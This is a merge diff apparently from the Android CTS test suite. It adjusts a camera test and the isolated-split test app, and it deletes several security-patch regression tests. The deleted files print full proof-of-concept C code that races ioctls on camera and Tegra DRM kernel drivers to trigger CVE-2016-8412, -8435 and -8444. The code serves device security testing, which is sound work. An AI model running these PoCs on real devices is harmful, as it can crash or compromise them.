Merge "Refactor StatsdValidationTest somewhat"
diff --git a/apps/CameraITS/tests/scene3/test_flip_mirror.py b/apps/CameraITS/tests/scene3/test_flip_mirror.py
index 86d96f1..197f62a 100644
--- a/apps/CameraITS/tests/scene3/test_flip_mirror.py
+++ b/apps/CameraITS/tests/scene3/test_flip_mirror.py
@@ -56,7 +56,8 @@
template = cv2.imread(CHART_FILE, cv2.IMREAD_ANYDEPTH)
# take img, crop chart, scale and prep for cv2 template match
- req = its.objects.auto_capture_request()
+ s, e, _, _, fd = cam.do_3a(get_results=True)
+ req = its.objects.manual_capture_request(s, e, fd)
cap = cam.do_capture(req, fmt)
y, _, _ = its.image.convert_capture_to_planes(cap, props)
y = its.image.rotate_img_per_argv(y)
@@ -65,6 +66,9 @@
patch = 255 * its.cv2image.gray_scale_img(patch)
patch = its.cv2image.scale_img(patch.astype(np.uint8), chart.scale)
+ # sanity check on image
+ assert np.max(patch)-np.min(patch) > 255/8
+
# save full images if in debug
if debug:
its.image.write_image(template[:, :, np.newaxis]/255.0,
diff --git a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/Android.mk b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/Android.mk
index 0834642..3231710 100644
--- a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/Android.mk
@@ -18,20 +18,25 @@
include $(CLEAR_VARS)
+LOCAL_PACKAGE_NAME := CtsIsolatedSplitApp
LOCAL_USE_AAPT2 := true
LOCAL_MODULE_TAGS := tests
-LOCAL_SDK_VERSION := current
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-LOCAL_EXPORT_PACKAGE_RESOURCES := true
-LOCAL_STATIC_JAVA_LIBRARIES := ctstestrunner android-support-test
+LOCAL_SDK_VERSION := current
+# Feature splits are dependent on this base, so it must be exported.
+LOCAL_EXPORT_PACKAGE_RESOURCES := true
+
+# Make sure our test locale polish is not stripped.
+LOCAL_AAPT_INCLUDE_ALL_RESOURCES := true
+
+LOCAL_STATIC_JAVA_LIBRARIES := ctstestrunner android-support-test
LOCAL_SRC_FILES := $(call all-java-files-under, src)
-LOCAL_PACKAGE_NAME := CtsIsolatedSplitApp
+# Generate a locale split.
LOCAL_PACKAGE_SPLITS := pl
-# Tag this module as a cts test artifact
-
include $(BUILD_CTS_SUPPORT_PACKAGE)
+# Build the other splits.
include $(call first-makefiles-under,$(LOCAL_PATH))
diff --git a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_a/Android.mk b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_a/Android.mk
index 48b4e3b..dd76592 100644
--- a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_a/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_a/Android.mk
@@ -17,20 +17,32 @@
LOCAL_PATH:= $(call my-dir)
include $(CLEAR_VARS)
+LOCAL_PACKAGE_NAME := CtsIsolatedSplitAppFeatureA
LOCAL_USE_AAPT2 := true
LOCAL_MODULE_TAGS := tests
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
+
+# Feature splits are dependent on this split, so it must be exported.
LOCAL_EXPORT_PACKAGE_RESOURCES := true
-LOCAL_PACKAGE_NAME := CtsIsolatedSplitAppFeatureA
+
+# Make sure our test locale polish is not stripped.
+LOCAL_AAPT_INCLUDE_ALL_RESOURCES := true
LOCAL_SRC_FILES := $(call all-subdir-java-files)
+# Generate a locale split.
LOCAL_PACKAGE_SPLITS := pl
+# Code and resource dependency on the base.
LOCAL_APK_LIBRARIES := CtsIsolatedSplitApp
LOCAL_RES_LIBRARIES := $(LOCAL_APK_LIBRARIES)
-LOCAL_AAPT_FLAGS += --custom-package com.android.cts.isolatedsplitapp.feature_a
+# Although feature splits use unique resource package names, they must all
+# have the same manifest package name to be considered one app.
+LOCAL_AAPT_FLAGS += --rename-manifest-package com.android.cts.isolatedsplitapp
+
+# Assign a unique package ID to this feature split. Since these are isolated splits,
+# it must only be unique across a dependency chain.
LOCAL_AAPT_FLAGS += --package-id 0x80
include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_a/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_a/AndroidManifest.xml
index d3aed1d..958b8d0 100644
--- a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_a/AndroidManifest.xml
+++ b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_a/AndroidManifest.xml
@@ -15,17 +15,17 @@
-->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="com.android.cts.isolatedsplitapp"
+ package="com.android.cts.isolatedsplitapp.feature_a"
featureSplit="feature_a">
<application>
- <activity android:name=".feature_a.FeatureAActivity">
+ <activity android:name=".FeatureAActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
- <receiver android:name=".feature_a.FeatureAReceiver">
+ <receiver android:name=".FeatureAReceiver">
<intent-filter>
<action android:name="com.android.cts.isolatedsplitapp.ACTION" />
</intent-filter>
diff --git a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_b/Android.mk b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_b/Android.mk
index 64b5fc3..240fc2c 100644
--- a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_b/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_b/Android.mk
@@ -17,19 +17,29 @@
LOCAL_PATH:= $(call my-dir)
include $(CLEAR_VARS)
+LOCAL_PACKAGE_NAME := CtsIsolatedSplitAppFeatureB
LOCAL_USE_AAPT2 := true
LOCAL_MODULE_TAGS := tests
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-LOCAL_PACKAGE_NAME := CtsIsolatedSplitAppFeatureB
+
+# Make sure our test locale polish is not stripped.
+LOCAL_AAPT_INCLUDE_ALL_RESOURCES := true
LOCAL_SRC_FILES := $(call all-subdir-java-files)
+# Generate a locale split.
LOCAL_PACKAGE_SPLITS := pl
+# Code and resource dependency on the base and feature A.
LOCAL_APK_LIBRARIES := CtsIsolatedSplitApp CtsIsolatedSplitAppFeatureA
LOCAL_RES_LIBRARIES := $(LOCAL_APK_LIBRARIES)
-LOCAL_AAPT_FLAGS := --custom-package com.android.cts.isolatedsplitapp.feature_b
+# Although feature splits use unique resource package names, they must all
+# have the same manifest package name to be considered one app.
+LOCAL_AAPT_FLAGS := --rename-manifest-package com.android.cts.isolatedsplitapp
+
+# Assign a unique package ID to this feature split. Since these are isolated splits,
+# it must only be unique across a dependency chain.
LOCAL_AAPT_FLAGS += --package-id 0x81
include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_b/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_b/AndroidManifest.xml
index 00c2d6c..d89a1f2 100644
--- a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_b/AndroidManifest.xml
+++ b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_b/AndroidManifest.xml
@@ -15,19 +15,19 @@
-->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="com.android.cts.isolatedsplitapp"
+ package="com.android.cts.isolatedsplitapp.feature_b"
featureSplit="feature_b">
<uses-split android:name="feature_a" />
<application>
- <activity android:name=".feature_b.FeatureBActivity">
+ <activity android:name=".FeatureBActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
- <receiver android:name=".feature_b.FeatureBReceiver">
+ <receiver android:name=".FeatureBReceiver">
<intent-filter>
<action android:name="com.android.cts.isolatedsplitapp.ACTION" />
</intent-filter>
diff --git a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_c/Android.mk b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_c/Android.mk
index f21d1d0..35b3252 100644
--- a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_c/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_c/Android.mk
@@ -17,19 +17,29 @@
LOCAL_PATH:= $(call my-dir)
include $(CLEAR_VARS)
+LOCAL_PACKAGE_NAME := CtsIsolatedSplitAppFeatureC
LOCAL_USE_AAPT2 := true
LOCAL_MODULE_TAGS := tests
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-LOCAL_PACKAGE_NAME := CtsIsolatedSplitAppFeatureC
+
+# Make sure our test locale polish is not stripped.
+LOCAL_AAPT_INCLUDE_ALL_RESOURCES := true
LOCAL_SRC_FILES := $(call all-subdir-java-files)
+# Generate a locale split.
LOCAL_PACKAGE_SPLITS := pl
+# Code and resource dependency on the base.
LOCAL_APK_LIBRARIES := CtsIsolatedSplitApp
LOCAL_RES_LIBRARIES := $(LOCAL_APK_LIBRARIES)
-LOCAL_AAPT_FLAGS := --custom-package com.android.cts.isolatedsplitapp.feature_c
-LOCAL_AAPT_FLAGS += --package-id 0x82
+# Although feature splits use unique resource package names, they must all
+# have the same manifest package name to be considered one app.
+LOCAL_AAPT_FLAGS := --rename-manifest-package com.android.cts.isolatedsplitapp
+
+# Use the same package ID as feature A, since this is an isolated split and
+# will not be loaded together with feature A.
+LOCAL_AAPT_FLAGS += --package-id 0x80
include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_c/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_c/AndroidManifest.xml
index ac3a57f..64b087c 100644
--- a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_c/AndroidManifest.xml
+++ b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/feature_c/AndroidManifest.xml
@@ -15,17 +15,17 @@
-->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="com.android.cts.isolatedsplitapp"
+ package="com.android.cts.isolatedsplitapp.feature_c"
featureSplit="feature_c">
<application>
- <activity android:name=".feature_c.FeatureCActivity">
+ <activity android:name=".FeatureCActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
- <receiver android:name=".feature_c.FeatureCReceiver">
+ <receiver android:name=".FeatureCReceiver">
<intent-filter>
<action android:name="com.android.cts.isolatedsplitapp.ACTION" />
</intent-filter>
diff --git a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/src/com/android/cts/isolatedsplitapp/SplitAppTest.java b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/src/com/android/cts/isolatedsplitapp/SplitAppTest.java
index 2f6af13..b85e21b 100644
--- a/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/src/com/android/cts/isolatedsplitapp/SplitAppTest.java
+++ b/hostsidetests/appsecurity/test-apps/IsolatedSplitApp/src/com/android/cts/isolatedsplitapp/SplitAppTest.java
@@ -45,15 +45,20 @@
@RunWith(AndroidJUnit4.class)
public class SplitAppTest {
private static final String PACKAGE = "com.android.cts.isolatedsplitapp";
+
private static final ComponentName FEATURE_A_ACTIVITY =
ComponentName.createRelative(PACKAGE, ".feature_a.FeatureAActivity");
private static final ComponentName FEATURE_B_ACTIVITY =
ComponentName.createRelative(PACKAGE, ".feature_b.FeatureBActivity");
private static final ComponentName FEATURE_C_ACTIVITY =
ComponentName.createRelative(PACKAGE, ".feature_c.FeatureCActivity");
- private static final String FEATURE_A_STRING = PACKAGE + ":string/feature_a_string";
- private static final String FEATURE_B_STRING = PACKAGE + ":string/feature_b_string";
- private static final String FEATURE_C_STRING = PACKAGE + ":string/feature_c_string";
+
+ private static final String FEATURE_A_STRING =
+ "com.android.cts.isolatedsplitapp.feature_a:string/feature_a_string";
+ private static final String FEATURE_B_STRING =
+ "com.android.cts.isolatedsplitapp.feature_b:string/feature_b_string";
+ private static final String FEATURE_C_STRING =
+ "com.android.cts.isolatedsplitapp.feature_c:string/feature_c_string";
private static final Configuration PL = new Configuration();
static {
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index d4cf524..052e976 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -17,15 +17,8 @@
<option name="config-descriptor:metadata" key="component" value="security" />
<target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
<option name="cleanup" value="true" />
- <option name="push" value="CVE-2016-8412->/data/local/tmp/CVE-2016-8412" />
- <option name="push" value="CVE-2016-8444->/data/local/tmp/CVE-2016-8444" />
- <option name="push" value="CVE-2016-8448->/data/local/tmp/CVE-2016-8448" />
- <option name="push" value="CVE-2016-8449->/data/local/tmp/CVE-2016-8449" />
<option name="push" value="CVE-2016-8460->/data/local/tmp/CVE-2016-8460" />
- <option name="push" value="CVE-2017-0403->/data/local/tmp/CVE-2017-0403" />
- <option name="push" value="CVE-2017-0404->/data/local/tmp/CVE-2017-0404" />
<option name="push" value="CVE-2016-8482->/data/local/tmp/CVE-2016-8482" />
- <option name="push" value="CVE-2017-0429->/data/local/tmp/CVE-2017-0429" />
<option name="push" value="CVE-2016-6730->/data/local/tmp/CVE-2016-6730" />
<option name="push" value="CVE-2016-6731->/data/local/tmp/CVE-2016-6731" />
<option name="push" value="CVE-2016-6732->/data/local/tmp/CVE-2016-6732" />
@@ -43,8 +36,6 @@
<option name="push" value="CVE-2016-8431->/data/local/tmp/CVE-2016-8431" />
<option name="push" value="CVE-2016-8432->/data/local/tmp/CVE-2016-8432" />
<option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
- <option name="push" value="CVE-2016-8435->/data/local/tmp/CVE-2016-8435" />
- <option name="push" value="CVE-2016-9120->/data/local/tmp/CVE-2016-9120" />
<option name="push" value="Bug-34328139->/data/local/tmp/Bug-34328139" />
<option name="push" value="Bug-33452365->/data/local/tmp/Bug-33452365" />
<option name="push" value="CVE-2017-0451->/data/local/tmp/CVE-2017-0451" />
@@ -59,14 +50,11 @@
<option name="push" value="CVE-2017-0586->/data/local/tmp/CVE-2017-0586" />
<option name="push" value="CVE-2017-0705->/data/local/tmp/CVE-2017-0705" />
<option name="push" value="CVE-2017-8263->/data/local/tmp/CVE-2017-8263" />
+
<!--__________________-->
<!-- Bulletin 2017-01 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
- <option name="push" value="CVE-2016-8457->/data/local/tmp/CVE-2016-8457" />
- <option name="push" value="CVE-2016-8456->/data/local/tmp/CVE-2016-8456" />
- <option name="push" value="CVE-2016-8455->/data/local/tmp/CVE-2016-8455" />
-
<!--__________________-->
<!-- Bulletin 2017-02 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
deleted file mode 100644
index e2a1c73..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
+++ /dev/null
@@ -1,32 +0,0 @@
-# Copyright (C) 2016 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-8412
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS := -Wall -Werror
-LOCAL_CFLAGS += -Wno-unused-variable
-LOCAL_LDFLAGS += -fPIE -pie
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
deleted file mode 100644
index d438b40..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
+++ /dev/null
@@ -1,69 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#include <unistd.h>
-#include <sys/syscall.h>
-#include <string.h>
-#include <stdint.h>
-#include <pthread.h>
-#include <stdio.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <fcntl.h>
-#include <signal.h>
-
-#define VIDIOC_MSM_ACTUATOR_CFG 0xc0d056c6
-#define MSM_SD_SHUTDOWN 0xc00856dd
-
-int fd;
-
-
-int main() {
- long i;
- int pid;
- pthread_t th[6];
- int argn[50] = {0};
-
- fd = open("/dev/v4l-subdev7", 0x0ul );
-
-
- argn[0] = 7;
- syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
-
- pid = fork();
- if(!pid){
- argn[0] = 1;
- while(1){
- usleep(10);
- syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
- }
- }
- i = 0;
- while(1){
- i++;
- argn[0] = 7;
- syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
-
- usleep(100);
-
- argn[0] = 0;
- syscall(__NR_ioctl, fd, MSM_SD_SHUTDOWN, argn, 0, 0, 0);
-
- }
-
- close(fd);
-
- return 0;
-}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
deleted file mode 100644
index 46920cf..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
+++ /dev/null
@@ -1,32 +0,0 @@
-# Copyright (C) 2016 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-8435
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS := -Wall -Werror
-LOCAL_CFLAGS += -Wno-missing-braces -Wno-missing-field-initializers
-LOCAL_LDFLAGS += -fPIE -pie
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
deleted file mode 100644
index 70574fe..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
+++ /dev/null
@@ -1,116 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#ifndef __local_pwn_H__
-#define __local_pwn_H__
-
-#define SIOCIWFIRSTPRIV 0x8BE0
-#define SIOCGIWNAME 0x8B01
-#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
-#define PRIV_CUSTOM_BWCS_CMD 13
-#define PRIV_CMD_OID 15
-#define PRIV_CMD_SW_CTRL 20
-#define PRIV_CMD_WSC_PROBE_REQ 22
-
-enum host1x_class {
- HOST1X_CLASS_HOST1X = 0x1,
- HOST1X_CLASS_NVENC = 0x21,
- HOST1X_CLASS_VI = 0x30,
- HOST1X_CLASS_ISPA = 0x32,
- HOST1X_CLASS_ISPB = 0x34,
- HOST1X_CLASS_GR2D = 0x51,
- HOST1X_CLASS_GR2D_SB = 0x52,
- HOST1X_CLASS_VIC = 0x5D,
- HOST1X_CLASS_GR3D = 0x60,
- HOST1X_CLASS_NVJPG = 0xC0,
- HOST1X_CLASS_NVDEC = 0xF0,
-};
-
-#define DRM_COMMAND_BASE 0x40
-#define DRM_COMMAND_END 0xA0
-
-#define DRM_TEGRA_OPEN_CHANNEL 0x05
-#define DRM_TEGRA_CLOSE_CHANNEL 0x06
-#define DRM_TEGRA_SUBMIT 0x08
-
-struct drm_tegra_open_channel {
- __u32 client;
- __u32 pad;
- __u64 context;
-};
-
-struct drm_tegra_close_channel {
- __u64 context;
-};
-
-struct drm_tegra_submit {
- __u64 context;
- __u32 num_syncpts;
- __u32 num_cmdbufs;
- __u32 num_relocs;
- __u32 num_waitchks;
- __u32 waitchk_mask;
- __u32 timeout;
- __u64 syncpts;
- __u64 cmdbufs;
- __u64 relocs;
- __u64 waitchks;
- __u32 fence; /* Return value */
- __u32 reserved0;
- __u64 fences;
- __u32 reserved1[2]; /* future expansion */
-};
-
-#define DRM_IOCTL_BASE 'd'
-#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
-#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
-#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
-#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
-
-struct drm_tegra_syncpt {
- __u32 id;
- __u32 incrs;
-};
-
-struct list_head {
- struct list_head *next, *prev;
-};
-
-struct tegra_drm_client_ops {
- void* open_channel;
- void* close_channel;
- void* reset;
- void* is_add_reg;
- void* submit;
-};
-
-struct tegra_drm_client {
- /* sizeof(host1x_client) is 232 */
- unsigned char pad[232]; /* maybe gadget arguments */
- struct list_head list;
- struct tegra_drm_client_ops *ops;
-};
-
-struct tegra_drm_context {
- struct tegra_drm_client *client;
- void *channel;
- struct list_head list;
- /* FIXME we need pass lock op */
- //struct mutex lock;
- //bool keepon;
- //struct host1x_user user;
-};
-
-#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
deleted file mode 100644
index ff6acb0..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
+++ /dev/null
@@ -1,74 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#define _GNU_SOURCE
-#include <string.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <sys/ioctl.h>
-#include <errno.h>
-#include <sys/stat.h>
-#include <fcntl.h>
-#include <sys/types.h>
-#include <unistd.h>
-#include <sys/syscall.h>
-
-#include "local_pwn.h"
-
-#define DEV "/dev/dri/renderD129"
-#define SYN_NUM 64
-
-struct drm_tegra_open_channel open_c = { 0 };
-struct drm_tegra_submit submit_c = { 0 };
-struct drm_tegra_syncpt syncpts[SYN_NUM] = { 0 };
-
-int main()
-{
- int ret;
- int dev_fd;
- int i;
-
- /* open dev */
- dev_fd = open(DEV,O_RDONLY);
- if(dev_fd == -1){
- printf("[-] open dev failed %d %s\n", errno, strerror(errno));
- return 0;
- }
-
- /* prepare for ioctl */
- open_c.client = HOST1X_CLASS_VIC;
- submit_c.num_syncpts = SYN_NUM;
- submit_c.syncpts = (__u64)syncpts;
-
- for(i = 1; i < SYN_NUM; i++){
- syncpts[i].id = 192;
- syncpts[i].incrs = 0xffff;
- }
-
- /* open channel */
- ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
- if(ret == -1){
- printf("[-] open_channel failed %d %s\n", errno, strerror(errno));
- goto out_dev;
- }
- submit_c.context = open_c.context;
- printf("[+] call submit\n");
- ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
- printf("[+] submit return %d\n", ret);
-
-out_dev:
- close(dev_fd);
- return 0;
-}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
deleted file mode 100644
index 531a3d1..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
+++ /dev/null
@@ -1,32 +0,0 @@
-# Copyright (C) 2016 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-8444
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS := -Wall -Werror
-LOCAL_CFLAGS += -Wno-unused-variable
-LOCAL_LDFLAGS += -fPIE -pie
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
deleted file mode 100644
index d681a43..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
+++ /dev/null
@@ -1,78 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#define _GNU_SOURCE
-#include <unistd.h>
-#include <fcntl.h>
-#include <sys/syscall.h>
-#include <stdio.h>
-#include <string.h>
-#include <stdint.h>
-#include <pthread.h>
-
-#define MSM_SD_SHUTDOWN 0xc00856dd
-#define VIDIOC_MSM_ISPIF_CFG 0xc17056c0
-
-struct ispif_cfg_data {
- int32_t cfg_type;
- union {
- int reg_dump; /* ISPIF_ENABLE_REG_DUMP */
- uint32_t csid_version; /* ISPIF_INIT */
- //struct msm_ispif_vfe_info vfe_info; /* ISPIF_SET_VFE_INFO */
- //struct msm_ispif_param_data params; /* CFG, START, STOP */
- };
-};
-
-long r[11];
-
-int fd;
-struct ispif_cfg_data data;
-
-void *worker_thread(void *arg) {
-
- int arg1[3] = {0};
- switch ((long)arg) {
- case 0:
- data.cfg_type = 8; ////release
- ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
- break;
- case 1:
- ioctl(fd, MSM_SD_SHUTDOWN, &arg1);
- break;
- }
- return NULL;
-}
-
-int main() {
-
- int pid,i;
- pthread_t th[4];
- fd = open( "/dev/v4l-subdev17", 0x0ul );
-
- printf("please wait for several seconds...\n");
-
- while(1){
-
- data.cfg_type = 2; ////init
- data.csid_version = 1;
- ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
-
- for (i = 0; i < 2; i++) {
- pthread_create(&th[i], 0, worker_thread, (void *)(long)i);
- usleep(10);
- }
- }
- return 0;
-}
